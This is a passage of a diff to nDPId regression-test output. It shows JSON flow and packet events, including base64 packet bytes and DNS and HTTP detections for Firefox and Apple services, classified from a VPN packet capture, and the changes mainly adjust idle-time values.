CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3eiXsRe4AREAA75QAAAQEIChwN0AsAIb2q"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAjsAAAAQEIChwN0AsGksZO"} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1569687267454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267454,"pkt":"NDY7z3UopHczjPFACABFAAA0sX1AAEAGc88KAACVCgAA4x9I3iGJexF7JTyt34ARAPMpJgAAAQEICgAh33UcDdAL"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1569687267455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267455,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3fiXsRfIAQEAAaFwAAAQEIChwN0A0AId91"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1569687267477,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1569687267477,"pkt":"LH6BsEqhNDY7z3UoCABFAAA5Pw0AAP8R2y0KAADjS0tLS9+lADUAJfklv50BAAABAAAAAAAAB21vemlsbGEDb3JnAAABAAE="} 00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1569687267481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1569687267481,"pkt":"LH6BsEqhNDY7z3UoCABFAABG89oAAP8RJlMKAADjS0tLS\/PbADUAMlit7RYBAAABAAAAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQAB"} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"thread_ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": 
{"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} -00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"thread_ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} 
+00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1569687267493,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569687267493,"pkt":"NDY7z3UoLH6BsEqhCABFAABJAABAADoRnytLS0tLCgAA4wA136UANZKzv52BgAABAAEAAAAAB21vemlsbGEDb3JnAAABAAHADAABAAEAAAAaAAQ\/9dDD"} 00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687267493,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"63.245.208.195"}} 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1569687267500,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1569687267500,"pkt":"NDY7z3UoLH6BsEqhCABFAADkAABAADoRnpBLS0tLCgAA4wA189sA0PLn7RaBgAABAAUAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQABwAwABQABAAAAIwAeDGRldGVjdHBvcnRhbARwcm9kBm1vemF3cwNuZXQAwDYABQABAAAADgAoDGRldGVjdHBvcnRhbAdmaXJlZm94BmNvbS12MgllZGdlc3VpdGXAT8BgAAUAAQAAUnoAFAVhMTA4OQRkc2NkBmFrYW1hacBPwJQAAQABAAAACQAEuBk4UsCUAAEAAQAAAAkABLgZODM="} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687267500,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.56.82"}} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1569687267677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1569687267677,"pkt":"LH6BsEqhNDY7z3UoCABFAABb+tIAAEAGzQsKAADjNApz0t4vAbv\/h0Qcal\/PeIAYEACaRQAAAQEIChwN0OQwQN34FwMDACIAAAAAAAAAAwpFwR2TiNxP0z\/UzUIiCJ75mBQ8ToLTjZaT"} -00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1569687267713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687267713,"pkt":"NDY7z3UoLH6BsEqhCABFAABXHWRAAOsGv300CnPSCgAA4wG73i9qX894\/4dEQ4AYAHaKdwAAAQEICjBBJbkcDdDkFwMDAB60PFmzucBfQdusHvXD0\/WWAM1faNPMBMLPArfIzdE="} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1569687267713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267713,"pkt":"LH6BsEqhNDY7z3UoCABFAAA09sQAAEAG0UAKAADjNApz0t4vAbv\/h0RDal\/Pm4AQD\/4TQgAAAQEIChwN0QUwQSW5"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1569687267764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267764,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAihAAAAQEIChwN0TcGksZO"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267797,"flow_last_seen":1569687267797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267797,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1569687267797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267797,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0xfMAAEAGCEEKAADjETmQdN42FGcxHLjbZd23sYAREACqlQAAAQEIChwN0VbVpVJo"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1569687267677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1569687267677,"pkt":"LH6BsEqhNDY7z3UoCABFAABb+tIAAEAGzQsKAADjNApz0t4vAbv\/h0Qcal\/PeIAYEACaRQAAAQEIChwN0OQwQN34FwMDACIAAAAAAAAAAwpFwR2TiNxP0z\/UzUIiCJ75mBQ8ToLTjZaT"} 
+00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1569687267713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687267713,"pkt":"NDY7z3UoLH6BsEqhCABFAABXHWRAAOsGv300CnPSCgAA4wG73i9qX894\/4dEQ4AYAHaKdwAAAQEICjBBJbkcDdDkFwMDAB60PFmzucBfQdusHvXD0\/WWAM1faNPMBMLPArfIzdE="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1569687267713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267713,"pkt":"LH6BsEqhNDY7z3UoCABFAAA09sQAAEAG0UAKAADjNApz0t4vAbv\/h0RDal\/Pm4AQD\/4TQgAAAQEIChwN0QUwQSW5"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1569687267764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267764,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAihAAAAQEIChwN0TcGksZO"} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267797,"flow_last_seen":1569687267797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267797,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1569687267797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267797,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0xfMAAEAGCEEKAADjETmQdN42FGcxHLjbZd23sYAREACqlQAAAQEIChwN0VbVpVJo"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1569687267799,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1569687267799,"pkt":"LH6BsEqhNDY7z3UoCABFAAA72BEAAP8RQicKAADjS0tLS+u1ADUAJxlWhe8BAAABAAAAAAAAA3d3dwVhcHBsZQNjb20AAAEAAQ=="} 00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -224,16 +224,16 @@ 00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687267818,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.188.138.71"}} 00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1569687267819,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1569687267819,"pkt":"NDY7z3UoLH6BsEqhCABFAACwAABAADoRnsRLS0tLCgAA4wA1x3QAnFOt9V6BgAABAAMAAAAACTEtY291cmllcgRwdXNoBWFwcGxlA2NvbQAAAQABwAwABQABAAAYQwAlATESY291cmllci1wdXNoLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA2AAUAAQAAABcAHQ91cy1zdy1jb3VyaWVyLTQKcHVzaC1hcHBsZcBLwGcAAQABAAAAFwAEETmQdA=="} 
00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687267819,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.116"}} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":1569687267820,"pkt":"NDY7z3UoLH6BsEqhCABFAABp+WRAADUGn5oROZB0CgAA4xRn3jZl3bexMRy43IAYARnThAAAAQEICtWmYt0cDdFWFQMDADDYQSIj3jkYV2ViIYpeEoheM2HYhDINcbYvi9M0lKa7pHKjHCudSoLIJkInalaEjXI="} 